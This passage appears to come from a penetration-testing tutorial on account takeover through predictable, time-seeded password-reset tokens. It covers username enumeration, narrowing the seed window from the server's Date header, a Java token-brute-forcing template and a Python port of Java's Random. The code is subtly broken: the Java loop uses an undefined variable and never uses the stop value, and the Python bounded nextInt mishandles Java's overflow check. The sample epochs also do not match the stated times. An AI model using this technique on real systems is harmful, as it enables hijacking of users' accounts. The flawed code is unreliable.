Exploitation

Identify the user

Brute force

We can take several approaches during this step. One of the possibilities is brute forcing application users based on the output of forgot passsword function.

Other vulnerability

Sometimes there is likelihood that in the application is present other vulnerability which allows us to get the usernames or emails needed to perform password reset flow.

Calculate time between request and response

We should not base our timer on the our system since the clock on the server can be set to other value.

In the next step we have to send the request to vulnerable function at the server side.

Take the date from response convert to epoch and add to that time +1 second -> this is our stop.

Take the date from response convert to epoch and substract that time -1 second -> this is our start.

In our case:

start = Thy, 21 Aug 2025 13:58:04 GMT converted to epoch

stop = Thy, 21 Aug 2025 13:58:06 GMT converted to epoch

We can use the following web page in order to swap date to epoch: http://epochconverter.com

Code based on the vulnerable application

Below is the template for generating the tokens in Java (use the language that is being used in the application).

public static void main(String args[]) {
        long start = Long.parseLong("1755785223000"); // <- swap with start time
        long stop = Long.parseLong("1755785225000"); // <- swap with stop time
        String token = "";

        for (long seed = start; l < seed; l++) {
            token = getToken(seed);
            System.out.println(token);
        }
    }
    
public static String getToken(long seed) {
        // here goes the vulnerable code from web application 
        // (with currentMilis swap to seed)
}

Python alternative

Below you can find python implementation of Java Random class:

class JavaRandom:
    def __init__(self, seed):
        self.seed = (seed ^ 0x5DEECE66D) & ((1 << 48) - 1)

    def next(self, bits):
        self.seed = (self.seed * 0x5DEECE66D + 0xB) & ((1 << 48) - 1)
        return self.seed >> (48 - bits)

    def nextInt(self, bound=None):
        if bound is None:
            return self.next(32)
        if (bound & -bound) == bound:  # power of two
            return (bound * self.next(31)) >> 31
        bits = self.next(31)
        val = bits % bound
        while bits - val + (bound - 1) < 0:
            bits = self.next(31)
            val = bits % bound
        return val

    def nextDouble(self):
        return ((self.next(26) << 27) + self.next(27)) / float(1 << 53)